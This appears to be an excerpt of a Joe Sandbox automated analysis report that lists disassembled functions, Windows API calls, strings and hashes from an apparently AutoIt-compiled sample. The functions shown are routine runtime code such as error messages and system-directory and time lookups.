                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp
                                                                        • String ID: #32770
                                                                        • API String ID: 2292705959-463685578
                                                                        • Opcode ID: 9c9db078a89fb65df93825f00391fa4b2b5df4debf514c1fcd19acbdbf329840
                                                                        • Instruction ID: 751534ec7f0d65fb9b5b77927ca36f15771317359f069f314b0ab350118e5a7e
                                                                        • Opcode Fuzzy Hash: 9c9db078a89fb65df93825f00391fa4b2b5df4debf514c1fcd19acbdbf329840
                                                                        • Instruction Fuzzy Hash: 2CE0923261422D2AD7209AA9AC49EABF7ACEB85B61F000167FD04D3151E9609A45C7E1
                                                                        Function 008CB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008CB314: _memset.LIBCMT ref: 008CB321
                                                                          • Part of subcall function 008B0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008CB2F0,?,?,?,0089100A), ref: 008B0945
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0089100A), ref: 008CB2F4
                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0089100A), ref: 008CB303
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008CB2FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 3158253471-631824599
                                                                        • Opcode ID: b215262ccea979234d0ba0a5e933f42ebedce73c37dd2968cf043f30ae6c82f3
                                                                        • Instruction ID: 7a267c7a5288de14a29b99b14cd28653ff7cce514ac4063d15097ad996373ad3
                                                                        • Opcode Fuzzy Hash: b215262ccea979234d0ba0a5e933f42ebedce73c37dd2968cf043f30ae6c82f3
                                                                        • Instruction Fuzzy Hash: A1E03970214B418AD730AF68E4057867AE8FF00304F00892CE456C7341EBB4E408CFA2
                                                                        Function 008E7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008E7C82
                                                                          • Part of subcall function 008B3358: _doexit.LIBCMT ref: 008B3362
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: c871e929e129efa74a313b6b6312593510ed516a75ba7e2bac112db14cdc82d5
                                                                        • Instruction ID: c8cbc426c3604ce57949d252cd9a3a4beed9ae3a703d8b9005421f87319681b0
                                                                        • Opcode Fuzzy Hash: c871e929e129efa74a313b6b6312593510ed516a75ba7e2bac112db14cdc82d5
                                                                        • Instruction Fuzzy Hash: 49D02B323C831C37D11032ADBC07FCB7588DF05B56F040011FB04D92D349D1948041E6
                                                                        Function 008D1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 008D1775
                                                                          • Part of subcall function 0090BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,008D195E,?), ref: 0090BFFE
                                                                          • Part of subcall function 0090BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0090C010
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 008D196D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                        • String ID: WIN_XPe
                                                                        • API String ID: 582185067-3257408948
                                                                        • Opcode ID: cd3854fc689111a637224453e6c37720341b84af7f4907e33da1946a6c0385db
                                                                        • Instruction ID: 691dee3a2e2b820134d9d84cc78d3ff628d15e2d3b175c611ebf2dee451957b9
                                                                        • Opcode Fuzzy Hash: cd3854fc689111a637224453e6c37720341b84af7f4907e33da1946a6c0385db
                                                                        • Instruction Fuzzy Hash: 82F0157081910DEFCF15DB91C998AECBBB8FF08305F540096E102A21A4C7314E85DF20
                                                                        Function 008D1714 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID: %.3d$WIN_XPe
                                                                        • API String ID: 481472006-2409531811
                                                                        • Opcode ID: 61bba183c8a6b80de0b2c3f179a9f79d59b03448ff735aab34370811561a2f80
                                                                        • Instruction ID: a874800f91f60175d51d7049ff9b15230a1996fe743946e91b12ef0b980ae921
                                                                        • Opcode Fuzzy Hash: 61bba183c8a6b80de0b2c3f179a9f79d59b03448ff735aab34370811561a2f80
                                                                        • Instruction Fuzzy Hash: 90D0177190910CFACF049BD0988CCFA777CFF19319F140663B402E2264E2329B94EA21